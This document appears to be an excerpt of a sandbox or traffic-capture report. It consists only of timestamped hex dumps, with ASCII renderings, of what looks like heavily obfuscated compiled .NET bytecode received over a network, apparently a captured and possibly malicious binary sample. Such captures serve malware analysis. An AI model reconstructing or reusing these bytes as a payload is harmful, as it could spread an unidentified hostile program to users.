                      2023-10-24 07:28:52 UTC4INData Raw: 00 01 20 63 1d 01 00 58 1f 3d 18 d8 28 03 00 00 06 28 4e 00 00 0a 0d de 3b de 39 25 28 32 00 00 0a 0c 20 e1 ee bf 54 20 a2 4f bf 54 61 20 97 a4 00 00 d3 b7 7e 27 00 00 0a 8e 20 9b 00 00 00 58 28 03 00 00 06 0d 28 33 00 00 0a de 07 28 33 00 00 0a de 00 09 2a 01 10 00 00 00 00 00 00 65 65 00 39 27 00 00 01 1b 30 04 00 da 00 00 00 18 00 00 11 7e 24 00 00 04 28 4f 00 00 0a 7e 20 00 00 04 16 28 50 00 00 0a 16 33 54 7e 0d 00 00 04 0a 06 1f 0d 62 1f 18 5e 06 20 34 09 00 00 5c 60 20 2c f7 39 56 33 02 2b 0e 7e 27 00 00 0a 8e 20 c1 69 00 00 58 2b 0c fe 1c 07 00 00 01 20 0b e8 5f 76 58 00 20 16 37 00 00 18 d8 23 00 00 00 00 00 00 35 40 b7 28 03 00 00 06 0b de 6e 2b 2b 7e 27 00 00 0a 8e 20 f0 16 01 00 58 7e 27 00 00 0a 8e 20 9a 19 01 00 58 20 77 0d 44 26 20 c1 0d 44
                      Data Ascii: cX=((N;9%(2 T OTa ~' X((3(3*ee9'0~$(O~ (P3T~b^ 4\` ,9V3+~' iX+ _vX 7#5@(n++~' X~' X wD& D
                      2023-10-24 07:28:52 UTC6INData Raw: 20 80 00 00 00 11 05 1f 14 5a 1f 0c 11 05 5a 58 1f 20 5a 5f 33 02 2b 0e fe 1c 1f 00 00 01 20 e1 5c 7c ce 58 2b 09 7e 27 00 00 0a 8e 1f 1b 58 00 00 28 03 00 00 06 28 2b 00 00 0a 7e 27 00 00 0a 8e 20 f3 ab 00 00 58 fe 1c 43 00 00 01 20 e5 b0 00 00 58 20 b5 03 ba c4 20 ed 03 ba c4 61 28 03 00 00 06 28 57 00 00 0a 7e 27 00 00 0a 8e 20 e5 ba 00 00 58 7e 27 00 00 0a 8e 20 82 c0 00 00 58 7e 27 00 00 0a 8e 1f 2e 58 28 03 00 00 06 73 58 00 00 0a 0b 73 37 00 00 0a 0a 07 6f 59 00 00 0a 6f 5a 00 00 0a 13 06 2b 6b 11 06 6f 5b 00 00 0a 0d 06 09 7e 27 00 00 0a 8e 20 32 b1 00 00 58 fe 1c 1f 00 00 01 20 e6 b2 00 00 58 fe 1c 2e 00 00 01 1f 4a 58 28 03 00 00 06 6f 5c 00 00 0a 6f 25 00 00 0a 6f 39 00 00 0a 26 06 fe 1c 43 00 00 01 20 87 f2 00 00 58 23 00 00 00 00 40 04 ef 40
                      Data Ascii: ZZX Z_3+ \|X+~'X((+~' XC X a((W~' X~' X~'.X(sXs7oYoZ+ko[~' 2X X.JX(o\o%o9&C X#@@
                      2023-10-24 07:28:52 UTC7INData Raw: 05 20 00 00 00 cc 5a 20 3e fd 6b 03 5f 16 2e 02 2b 0e fe 1c 21 00 00 01 20 e4 18 01 00 58 2b 0c fe 1c 1f 00 00 01 20 b4 94 4b 4e 58 00 7e 0a 00 00 04 0c 08 1f 2a 5c 20 c0 43 3a 8d 2e 02 2b 46 7e 0b 00 00 04 13 07 11 07 20 00 10 00 00 5c 20 80 e9 0a 00 1f 0c 11 07 5a 1a 11 07 5a 58 5a 5f 20 a0 f0 ff ff 2e 02 2b 0e fe 1c 20 00 00 01 20 5b b8 9d d8 58 2b 0c fe 1c 43 00 00 01 20 32 dc fa 58 58 00 2b 0a 21 fc 1a 01 00 00 00 00 00 b7 00 fe 1c 07 00 00 01 1f 21 58 28 03 00 00 06 80 1c 00 00 04 20 4e 89 53 5c 20 cf ae ac a3 d6 1f fa 20 28 17 00 00 1e 11 07 5a 61 60 1f fa 33 02 2b 0e fe 1c 2d 00 00 01 20 02 53 8f 4c 58 2b 0a 23 00 00 00 00 00 56 cd 40 b7 00 20 00 00 e0 ff 11 05 1f 20 5c 20 2d 0c 00 00 5c 5f 16 33 02 2b 0d 20 bd c6 f4 59 20 56 a3 e3 13 61 2b 09 fe
                      Data Ascii: Z >k_.+! X+ KNX~*\ C:.+F~ \ ZZXZ_ .+ [X+C 2XX+!!X( NS\ (Za`3+- SLX+#V@ \ -\_3+ Y Va+
                      2023-10-24 07:28:52 UTC8INData Raw: 13 2d 02 16 7d 25 00 00 04 38 9b 1e 00 00 28 33 00 00 0a 17 13 12 1b 13 2d 28 0b 00 00 06 6f 76 00 00 0a 6f 77 00 00 0a 20 a2 7d 00 00 fe 1c 1f 00 00 01 20 ee 5f 00 00 58 7e 27 00 00 0a 8e 20 8a 00 00 00 58 28 03 00 00 06 17 6f 78 00 00 0a 13 15 1c 13 2d 11 15 20 e7 09 00 00 7e 27 00 00 0a 8e 20 a2 2e 00 00 58 20 8e 42 2f 73 20 e0 bd d0 8c d6 28 03 00 00 06 6f 79 00 00 0a 17 8c 1f 00 00 01 16 28 7a 00 00 0a 2c 37 1d 13 2d 11 15 7e 27 00 00 0a 8e 20 8b 5b 00 00 58 fe 1c 3c 00 00 01 20 9f 7d 00 00 58 21 5c 00 00 00 00 00 00 00 b7 28 03 00 00 06 16 8c 1f 00 00 01 6f 7b 00 00 0a 1f 09 13 2d 7e 27 00 00 0a 8e 20 16 5e 00 00 58 fe 1c 2d 00 00 01 20 09 43 00 00 58 20 82 26 a4 0a 20 a6 26 a4 0a 61 d3 b7 28 03 00 00 06 fe 1c 43 00 00 01 20 28 72 00 00 58 fe 1c 21
                      Data Ascii: -}%8(3-(ovow } _X~' X(ox- ~' .X B/s (oy(z,7-~' [X< }X!\(o{-~' ^X- CX & &a(C (rX!
                      2023-10-24 07:28:52 UTC10INData Raw: 01 80 12 00 00 04 16 21 55 51 00 00 00 00 00 00 b7 7e 27 00 00 0a 8e 20 0f 73 00 00 58 11 04 20 00 10 3e 00 5a 20 d3 23 00 00 33 02 2b 0e 7e 27 00 00 0a 8e 20 9c 00 00 00 58 2b 0c fe 1c 2e 00 00 01 20 d5 9d 4a c3 58 00 28 03 00 00 06 a2 11 16 14 14 16 17 28 89 00 00 0a 1f 18 13 2d 11 32 14 7e 27 00 00 0a 8e 20 a6 b6 00 00 58 fe 1c 2e 00 00 01 20 d1 9b 00 00 58 fe 1c 3c 00 00 01 1f 7e 58 28 03 00 00 06 17 8d 12 00 00 01 13 16 11 16 16 20 a3 fa ff ff 20 37 6f 5c 97 7e 0d 00 00 04 13 06 11 06 58 11 06 19 5a 58 5f 16 2e 02 2b 0d 20 d5 a9 52 7d 20 96 8c 23 2e da 2b 0c fe 1c 1f 00 00 01 20 78 9d 00 00 58 00 7e 27 00 00 0a 8e 20 a0 be 00 00 58 7e 27 00 00 0a 8e 1d 58 28 03 00 00 06 a2 11 16 14 14 16 17 28 89 00 00 0a 1f 19 13 2d 11 32 14 7e 27 00 00 0a 8e 20 86
                      Data Ascii: !UQ~' sX >Z #3+~' X+. JX((-2~' X. X<~X( 7o\~XZX_.+ R} #.+ xX~' X~'X((-2~'
                      2023-10-24 07:28:52 UTC11INData Raw: 4b fc 4d 80 08 00 00 04 13 16 11 16 11 1a 80 0b 00 00 04 16 20 6a 30 00 00 18 11 12 11 12 58 65 5a 58 11 12 19 11 12 5a 58 20 63 1e 00 00 59 2e 02 2b 0d 20 b9 c7 70 7a 20 f6 61 d8 fd d6 2b 0c 7e 27 00 00 0a 8e 20 bc 7e 00 00 58 00 20 8b fa ff ff 7e 0e 00 00 04 13 1d 11 1d 20 00 00 b0 2c 5a 58 18 5a 66 20 09 1a 00 00 11 1d 1f 11 62 61 2e 02 2b 11 7e 27 00 00 0a 8e 20 c5 95 dc 79 58 38 fd 00 00 00 20 00 00 00 80 7e 0c 00 00 04 13 24 11 24 20 e4 ca 9e 6d 5e 20 21 f7 ff ff 61 5f 20 00 00 00 80 33 02 2b 11 7e 27 00 00 0a 8e 20 58 a7 30 34 58 38 c7 00 00 00 11 0f 20 ff 0f 00 80 60 66 20 84 e9 ff ff 2e 05 38 82 00 00 00 11 06 1f 0f 62 65 20 db 15 00 00 33 02 2b 0e 7e 27 00 00 0a 8e 20 b2 57 fa af 58 2b 62 20 ef 1b 83 42 11 13 19 62 19 64 58 11 13 20 72 07 00 00
                      Data Ascii: KM j0XeZXZX cY.+ pz a+~' ~X ~ ,ZXZf ba.+~' yX8 ~$$ m^ !a_ 3+~' X04X8 `f .8be 3+~' WX+b BbdX r
                      2023-10-24 07:28:52 UTC12INData Raw: 58 20 40 1a 00 00 61 11 19 20 f1 e9 ff ff 60 61 1a 5f 16 2e 02 2b 0e fe 1c 43 00 00 01 20 d8 00 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 f0 2a e9 9c 58 00 28 03 00 00 06 17 8d 12 00 00 01 13 16 11 16 16 11 1c 28 21 00 00 0a a2 11 16 14 14 16 17 28 89 00 00 0a 1f 22 13 2d 11 32 14 7e 27 00 00 0a 8e 20 61 a5 00 00 58 09 65 09 20 8a 10 00 00 59 61 17 5f 16 33 02 2b 0e 7e 27 00 00 0a 8e 20 6c 91 e0 45 58 2b 0c fe 1c 3c 00 00 01 20 00 84 00 00 58 00 7e 27 00 00 0a 8e 1f 0c 58 28 03 00 00 06 16 8d 12 00 00 01 14 14 14 28 88 00 00 0a 11 0b 16 28 8f 00 00 0a 28 90 00 00 0a 28 91 00 00 0a 2c 6a 1f 23 13 2d 11 32 14 fe 1c 3c 00 00 01 20 ce 08 01 00 58 20 00 00 c0 e2 11 13 20 00 20 00 00 5c 58 20 00 3a 2b 00 11 13 5a 20 00 80 00 00 5a 33 02 2b 0e 7e 27 00 00 0a 8e 20 4c
                      Data Ascii: X @a `a_.+C X+~' *X((!("-2~' aXe Ya_3+~' lEX+< X~'X(((((,j#-2< X \X :+Z Z3+~' L
                      2023-10-24 07:28:52 UTC14INData Raw: 47 97 cf 2e 02 2b 0e 7e 27 00 00 0a 8e 20 f7 bf 78 ae 58 2b 0c 7e 27 00 00 0a 8e 20 ea 11 00 00 58 00 7e 27 00 00 0a 8e 20 e7 32 00 00 58 7e 27 00 00 0a 8e 1f 16 58 28 03 00 00 06 a2 11 16 14 14 16 17 28 89 00 00 0a 1f 2f 13 2d 11 1f 14 fe 1c 43 00 00 01 20 48 5c 00 00 58 20 49 20 1a c3 20 65 5c e6 3c d6 7e 27 00 00 0a 8e 20 d2 00 00 00 58 28 03 00 00 06 17 8d 12 00 00 01 13 16 11 16 16 20 5c de ff ff 11 22 20 62 02 87 76 5e 61 16 33 02 2b 0e 7e 27 00 00 0a 8e 20 f0 e2 00 00 58 2b 0b 20 2e 9f 0f 3a 20 09 2c 0d b2 d6 00 7e 27 00 00 0a 8e 20 e7 c1 00 00 58 7e 27 00 00 0a 8e 1f 30 58 28 03 00 00 06 a2 11 16 14 14 16 17 28 89 00 00 0a 1f 30 13 2d 11 1f 14 fe 1c 1f 00 00 01 20 5c ec 00 00 58 7e 27 00 00 0a 8e 20 94 cc 00 00 58 20 b2 25 00 00 06 1f 4f 5a 20 b1
                      Data Ascii: G.+~' xX+~' X~' 2X~'X((/-C H\X I e\<~' X( \" bv^a3+~' X+ .: ,~' X~'0X((0- \X~' X %OZ
                      2023-10-24 07:28:52 UTC15INData Raw: 14 61 5a 20 00 00 60 d1 58 11 14 20 00 02 c0 ff 5a 33 02 2b 0e 7e 27 00 00 0a 8e 20 d0 00 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 66 a0 e8 59 58 00 00 2b 0c 7e 27 00 00 0a 8e 20 29 34 1d ed 58 00 28 03 00 00 06 a2 11 16 14 14 14 28 88 00 00 0a 28 21 00 00 0a 13 0d 1f 32 13 2d 08 14 7e 27 00 00 0a 8e 20 31 db 00 00 58 7e 27 00 00 0a 8e 20 cf fb 00 00 58 fe 1c 28 00 00 01 20 c3 00 00 00 58 28 03 00 00 06 17 8d 12 00 00 01 13 16 11 16 16 02 7b 27 00 00 04 11 2a 28 94 00 00 0a 11 2d 1f 0a 62 1b 5c 20 91 b5 6f a8 33 02 2b 0d 20 bc 27 a7 00 20 d7 77 59 ff d6 2b 0b 20 ca ac 71 5e 20 6a 7e 58 3b 61 00 fe 1c 1f 00 00 01 20 0c 88 00 00 58 17 1a 11 2c 5a 11 2c 1f 7c 5a 58 1d 64 5f 17 20 ef 09 00 00 11 2c 58 20 81 1b 00 00 59 5f 33 02 2b 39 20 00 00 00 20 11 0f 20 00 00
                      Data Ascii: aZ `X Z3+~' X+~' fYX+~' )4X(((!2-~' 1X~' X( X({'*(-b\ o3+ ' wY+ q^ j~X;a X,Z,|ZXd_ ,X Y_3+9
                      2023-10-24 07:28:52 UTC16INData Raw: fe 03 11 12 16 fe 03 5f 09 16 fe 01 5f fe 11 74 27 00 00 01 28 32 00 00 0a de c1 20 33 00 0a 80 28 99 00 00 0a 7a 09 2c 05 28 33 00 00 0a 2a 00 00 41 1c 00 00 01 00 00 00 00 00 00 00 11 20 00 00 26 20 00 00 0c 00 00 00 11 20 00 00 1e 02 28 1f 00 00 0a 2a 1b 30 07 00 78 04 00 00 23 00 00 11 20 e8 03 00 00 28 98 00 00 0a 28 27 00 00 06 2d 06 16 28 9a 00 00 0a 28 34 00 00 06 de 0f 25 28 32 00 00 0a 13 09 28 33 00 00 0a de 00 1d 28 9b 00 00 0a 7e 0e 00 00 04 13 04 11 04 1e 62 66 20 1d 19 00 00 5f 16 2e 02 2b 2f 1f fe 16 11 04 5f 11 04 11 04 58 61 60 1f fe 33 02 2b 0d 20 de 74 91 4b 20 e0 d8 13 ee 58 2b 0c fe 1c 21 00 00 01 20 bc 0e 2c 88 58 00 2b 0a 21 3f 1a 01 00 00 00 00 00 b7 00 20 51 20 01 00 b9 b7 fe 1c 43 00 00 01 20 87 00 00 00 58 28 03 00 00 06 7e 24
                      Data Ascii: __t'(2 3(z,(3*A & (*0x# (('-((4%(2(3(~bf _.+/_Xa`3+ tK X+! ,X+!? Q C X(~$
                      2023-10-24 07:28:52 UTC18INData Raw: 00 06 2d 07 28 38 00 00 06 2c 02 2b 07 28 39 00 00 06 2c 02 2b 07 28 36 00 00 06 2c 02 2b 07 28 35 00 00 06 2c 06 14 28 a5 00 00 0a 2a 00 00 00 1b 30 05 00 64 00 00 00 24 00 00 11 73 a6 00 00 0a 20 f9 b8 42 cd 20 67 85 42 cd 61 20 96 3c 00 00 0c 08 7e 27 00 00 0a 8e 1f 1b 58 28 03 00 00 06 6f a7 00 00 0a 0b 07 20 ad 2d 00 00 23 00 00 00 00 00 46 c6 40 b7 7e 27 00 00 0a 8e 1f 45 58 28 03 00 00 06 6f a8 00 00 0a 0a de 11 de 0c 28 32 00 00 0a 28 33 00 00 0a de 00 16 0a 00 06 2a 01 10 00 00 00 00 00 00 53 53 00 0c 27 00 00 01 1b 30 07 00 72 01 00 00 25 00 00 11 73 a9 00 00 0a 6f aa 00 00 0a 6f 86 00 00 0a 17 7e 0a 00 00 04 0c 08 08 20 ed 03 f8 ff 60 66 5a 5f 16 2e 0d 00 08 66 1f 40 5f 1f 40 2e 03 2b 56 00 20 80 2c a4 10 08 5a 20 55 1c 00 00 61 16 2e 02 2b 34
                      Data Ascii: -(8,+(9,+(6,+(5,(*0d$s B gBa <~'X(o -#F@~'EX(o(2(3*SS'0r%soo~ `fZ_.f@_@.+V ,Z Ua.+4
                      2023-10-24 07:28:52 UTC19INData Raw: cb c0 d2 2a 33 02 2b 0e fe 1c 07 00 00 01 20 11 9d 00 00 58 2b 0c fe 1c 2e 00 00 01 20 03 b2 29 72 58 00 fe 1c 07 00 00 01 20 1b 9c 00 00 58 7e 27 00 00 0a 8e 20 a1 00 00 00 58 28 03 00 00 06 a2 08 14 28 ae 00 00 0a 6f 25 00 00 0a 20 ff ff 03 00 06 1f 12 64 20 a0 de ff ff 59 60 20 ff ff 03 00 2e 02 2b 0e 7e 27 00 00 0a 8e 20 d2 f7 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 04 b1 82 af 58 00 11 0a 20 21 08 01 00 5c 20 ff ff d6 3f 60 20 ff ff d6 3f 2e 02 2b 0f 20 6f f7 ea 69 20 ca 09 16 96 d6 d3 69 2b 62 20 f0 02 80 00 11 0a 20 00 00 00 40 5c 11 07 20 b3 d2 59 00 5e 60 61 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 32 d0 21 77 58 2b 37 11 0a 20 1f f0 ff ff 59 11 0a 5f 20 f6 12 00 00 5f 20 16 f2 86 9f 61 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 b5 65 49 3c 58 2b 0c 7e 27 00 00
                      Data Ascii: *3+ X+. )rX X~' X((o% d Y` .+~' X+~' X !\ ?` ?.+ oi i+b @\ Y^`a.+~' 2!wX+7 Y_ _ a.+~' eI<X+~'
                      2023-10-24 07:28:52 UTC20INData Raw: 7a 7b 83 20 d0 79 7b 83 da 28 03 00 00 06 a2 11 0c 17 7e 33 00 00 04 28 21 00 00 0a a2 11 0c 18 28 1b 00 00 06 a2 11 0c 19 7e 33 00 00 04 28 21 00 00 0a a2 11 0c 1a 28 2a 00 00 0a a2 11 0c 1b 7e 33 00 00 04 28 21 00 00 0a a2 11 0c 1c 20 c3 da 26 71 80 10 00 00 04 11 0d 6f aa 00 00 0a 7e 27 00 00 0a 8e 20 c8 a5 00 00 58 20 10 65 00 00 07 65 1f 10 5a 58 07 65 1f 0b 5a 1b 07 65 5a 58 33 02 2b 58 07 20 00 00 00 01 5a 20 3e ec a1 40 2e 02 2b 39 20 00 e0 0c 01 07 5a 20 a0 87 01 00 58 1a 20 90 06 00 00 07 1b 62 5f 5a 33 02 2b 0e 7e 27 00 00 0a 8e 20 9b bc ff 64 58 2b 0c 23 00 00 00 85 94 ed d1 c1 69 0d 09 00 2b 0c 7e 27 00 00 0a 8e 20 52 af 00 00 58 00 2b 0a 21 31 42 54 ad ff ff ff ff b7 00 7e 27 00 00 0a 8e 20 fd 00 00 00 58 28 03 00 00 06 20 55 c9 c6 97 80 0d
                      Data Ascii: z{ y{(~3(!(~3(!(*~3(! &qo~' X eeZXeZeZX3+X Z >@.+9 Z X b_Z3+~' dX+#i+~' RX+!1BT~' X( U
                      2023-10-24 07:28:52 UTC22INData Raw: 0a 23 00 00 c0 1d da 68 d1 c1 b7 00 28 03 00 00 06 6f 8a 00 00 0a a2 11 0c 1f 09 7e 33 00 00 04 28 21 00 00 0a a2 11 0c 1f 0a 7e 27 00 00 0a 8e 20 23 3b 00 00 58 7e 27 00 00 0a 8e 20 cd 3c 00 00 58 7e 08 00 00 04 13 04 11 04 65 20 07 fc ff ff 59 11 04 20 9c e2 ff ff 59 2e 02 2b 0e 7e 27 00 00 0a 8e 20 87 7f 7f 31 58 2b 09 fe 1c 3c 00 00 01 1f 52 58 00 28 03 00 00 06 a2 11 0c 1f 0b 7e 33 00 00 04 28 21 00 00 0a a2 11 0c 1f 0c 28 22 00 00 06 a2 11 0c 1f 0d 7e 33 00 00 04 28 21 00 00 0a a2 11 0c 1f 0e 28 23 00 00 06 a2 11 0c 1f 0f 7e 33 00 00 04 7e 27 00 00 0a 8e 20 5c 82 00 00 58 20 00 00 58 73 20 00 00 02 00 20 9a 25 00 00 7e 0a 00 00 04 13 06 11 06 60 1a 62 5a 58 20 00 00 00 ec 11 07 5a 33 02 2b 0e 7e 27 00 00 0a 8e 20 07 85 00 00 58 2b 07 20 d9 5d 29 c1
                      Data Ascii: #h(o~3(!~' #;X~' <X~e Y Y.+~' 1X+<RX(~3(!("~3(!(#~3~' \X Xs %~`bZX Z3+~' X+ ])
                      2023-10-24 07:28:52 UTC23INData Raw: 2d 01 00 00 0b 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 21 00 00 11 7e 2b 00 00 04 02 6f d0 00 00 0a 26 de 14 25 28 32 00 00 0a 0a 16 80 2a 00 00 04 28 33 00 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 0e 0e 00 14 27 00 00 01 1b 30 02 00 8f 00 00 00 2c 00 00 11 7e 30 00 00 04 2c 20 7e 30 00 00 04 6f d1 00 00 0a 14 80 30 00 00 04 de 0e 25 28 32 00 00 0a 0c 28 33 00 00 0a de 00 7e 2f 00 00 04 2c 2a 7e 2f 00 00 04 6f d2 00 00 0a 7e 2f 00 00 04 6f c4 00 00 0a 14 80 2f 00 00 04 de 0e 25 28 32 00 00 0a 0a 28 33 00 00 0a de 00 7e 2b 00 00 04 2c 2a 7e 2b 00 00 04 6f d3 00 00 0a 7e 2b 00 00 04 6f 70 00 00 0a 14 80 2b 00 00 04 de 0e 25 28 32 00 00 0a 0b 28 33 00 00 0a de 00 28 d4 00 00 0a 2a 00 01 28 00 00 00 00 07 00 12 19 00 0e 27 00 00 01 00 00 2e 00 1c 4a 00
                      Data Ascii: -0#!~+o&%(2*(3*'0,~0, ~0o0%(2(3~/,*~/o~/o/%(2(3~+,*~+o~+op+%(2(3(*('.J
                      2023-10-24 07:28:52 UTC24INData Raw: 16 28 50 00 00 0a 16 33 20 7e 2b 00 00 04 18 6f df 00 00 0a 7e 2b 00 00 04 6f d3 00 00 0a 16 28 9a 00 00 0a 38 64 89 00 00 11 9e 7e 27 00 00 0a 8e 20 d8 29 00 00 58 11 3d 1f 15 62 20 73 e9 ff ff 33 05 38 86 00 00 00 11 19 1f 09 62 66 11 19 20 db 11 00 00 61 20 00 02 00 00 5a 33 02 2b 0d 20 05 4f c0 ca 20 7c d6 3f 35 d6 2b 5e 11 a3 1f 11 5a 11 a3 1f 0f 5a 58 65 20 b3 ba 45 57 33 02 2b 3d 11 a3 66 20 00 00 20 00 5e 20 cb eb 03 00 5c 20 16 08 00 00 61 20 00 80 ff ff 5f 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 2a dd 57 72 58 2b 0c 7e 27 00 00 0a 8e 20 c8 b7 38 2f 58 00 2b 0b 20 cb 04 37 1a 20 dd 48 bd 2b 58 00 00 2b 0c 7e 27 00 00 0a 8e 20 e4 bf 42 79 58 00 fe 1c 43 00 00 01 1f 25 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 bf 00 00 00 7e 23 00 00 04 6f 30 00 00 06
                      Data Ascii: (P3 ~+o~+o(8d~' )X=b s38bf a Z3+ O |?5+^ZZXe EW3+=f ^ \ a _.+~' *WrX+~' 8/X+ 7 H+X+~' ByXC%X((P@~#o0
                      2023-10-24 07:28:52 UTC26INData Raw: 2e 02 2b 0d 20 68 a4 a7 ba 20 4b 05 b4 fd 61 2b 0a 23 00 00 00 00 a0 60 e4 40 b7 00 20 ec ae 00 00 d3 69 7e 27 00 00 0a 8e 20 af 00 00 00 58 28 03 00 00 06 16 8d 12 00 00 01 14 14 14 28 88 00 00 0a 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 28 1b 00 00 06 28 8d 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 ca 83 00 00 11 9e 7e 27 00 00 0a 8e 20 0f 05 01 00 58 7e 27 00 00 0a 8e 20 bd 0f 01 00 58 20 ae f0 ff ff 11 19 1f 16 62 58 20 00 40 00 00 5a 66 11 19 20 00 01 00 00 5c 2e 02 2b 0e 7e 27 00 00 0a 8e 20 0f 70 27 94 58 2b 0c fe 1c 2d 00 00 01 20 f3 00 00 00 58 00 28 03 00 00 06 16 28 50 00 00 0a 16 33 3d 12 a2 11 6d 7b 3f 00 00 04 17 9a 28 b9 00 00 0a 11 6d 7b 3f 00 00 04 18 9a 28 b9 00 00 0a 28 e4 00 00 0a 11 a2 11 6d 7b 3f 00 00 04 19 9a 28 b9 00 00 0a 28
                      Data Ascii: .+ h Ka+#`@ i~' X(((~4((((V(C8~' X~' X bX @Zf \.+~' p'X+- X((P3=m{?(m{?((m{?((
                      2023-10-24 07:28:52 UTC27INData Raw: 20 f7 f8 ff ff 58 11 64 1f 0b 62 20 00 00 00 d8 59 20 00 00 00 08 11 64 20 00 00 01 00 5c 5a 33 05 38 2e 01 00 00 7e 11 00 00 04 13 86 11 86 20 00 04 00 00 11 86 1f 0a 64 5a 61 20 00 00 80 c4 5f 16 2e 05 38 d1 00 00 00 11 79 20 d8 45 b5 6f 5f 20 53 07 00 00 59 66 20 bd 14 00 00 61 19 5f 19 33 05 38 a3 00 00 00 11 4b 20 eb 10 00 00 5f 20 4f f3 ff ff 58 11 4b 20 86 f2 ff ff 59 33 02 2b 0e fe 1c 1f 00 00 01 20 f9 e0 1b c7 58 2b 78 20 53 11 00 00 19 7e 09 00 00 04 13 4d 11 4d 5a 11 3d 20 00 00 43 dc 5a 11 4d 5f 58 11 4d 58 20 99 00 00 00 58 61 16 33 02 2b 40 20 80 6d 0b 00 11 3d 5a 1b 64 20 be f1 ff ff 59 19 11 3d 5a 1b 11 3d 5a 58 20 e1 11 00 00 58 2e 02 2b 0e 7e 27 00 00 0a 8e 20 68 4f 71 92 58 2b 0c fe 1c 21 00 00 01 20 c7 5c 4d 8d 58 00 2b 0c 7e 27 00 00
                      Data Ascii: Xdb Y d \Z38.~ dZa _.8y Eo_ SYf a_38K _ OXK Y3+ X+x S~MMZ= CZM_XMX Xa3+@ m=Zd Y=Z=ZX X.+~' hOqX+! \MX+~'
                      2023-10-24 07:28:52 UTC28INData Raw: 1f 00 00 01 a2 11 99 14 14 28 ed 00 00 0a 38 6f 79 00 00 11 9e 7e 27 00 00 0a 8e 20 9b a0 00 00 58 11 a1 1f 0e 62 11 a1 1f 14 62 20 03 23 00 00 58 59 20 94 ad ba 4f 33 02 2b 0e 7e 27 00 00 0a 8e 20 4a ab 00 00 58 2b 0a 23 00 00 80 8c c6 0b df 41 b7 00 fe 1c 2e 00 00 01 1f 51 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 17 11 6d 7b 3f 00 00 04 17 9a 16 16 15 28 ee 00 00 0a 26 38 00 79 00 00 11 9e 20 90 cd 01 00 11 a3 58 11 a3 20 ff 00 00 00 5a 58 11 a3 1f 0f 62 20 11 19 00 00 59 33 02 2b 0e fe 1c 3c 00 00 01 20 16 8f 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 48 41 4d ac 58 00 20 86 96 00 00 20 14 0d 00 00 61 20 eb 06 a0 5d 20 4a 06 a0 5d da 28 03 00 00 06 16 28 50 00 00 0a 16 40 0f 03 00 00 20 ea 8b 9b 40 20 16 b6 9b 40 61 11 30 20 00 00 a0 9c 5a 20 46 db ff ff 33
                      Data Ascii: (8oy~' Xbb #XY O3+~' JX+#A.QX((P3m{?(&8y X ZXb Y3+< X+~' HAMX a ] J]((P@ @ @a0 Z F3
                      2023-10-24 07:28:52 UTC30INData Raw: 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 93 68 00 00 58 fe 1c 28 00 00 01 20 1b 68 00 00 58 7e 27 00 00 0a 8e 1f 1f 58 28 03 00 00 06 18 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 17 11 6d 7b 3f 00 00 04 13 08 11 08 19 13 43 11 43 9a a2 11 99 13 40 11 40 14 14 18 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 11 3e 17 90 2c 29 11 08 11 43 11 4e 80 03 00 00 04 11 40 17 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 44 73 00 00 11 9e 7e 27 00 00 0a 8e 20 62 4e 00 00 58 21 2f 5e 00 00 00 00 00 00 b7 20 4f
                      Data Ascii: m{?(~' hX( hX~'X(m{?##m{?CC@@;>>>>(&>,"#@(!($(t>,)CN@(!($(t8Ds~' bNX!/^ O
                      2023-10-24 07:28:52 UTC31INData Raw: 00 00 58 fe 1c 07 00 00 01 20 af 13 00 00 58 20 00 b2 24 00 11 a3 5a 20 ca fe ff ff 60 20 ca fe ff ff 2e 02 2b 0b 7e 27 00 00 0a 8e 1f 27 58 2b 0c fe 1c 1f 00 00 01 20 c4 94 20 5c 58 00 28 03 00 00 06 18 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 17 11 6d 7b 3f 00 00 04 13 08 11 08 19 13 43 11 43 9a a2 11 99 13 40 11 40 14 14 18 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 11 3e 17 90 2c 22 11 08 11 43 11 40 17 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 e3 6d 00 00 11 9e 7e 27 00 00 0a 8e 20 b0 ec 00 00 58 18 11 6b 5a
                      Data Ascii: X X $Z ` .+~''X+ \X(m{?##m{?CC@@;>>>>(&>,"#@(!($(t>,"C@(!($(t8m~' XkZ
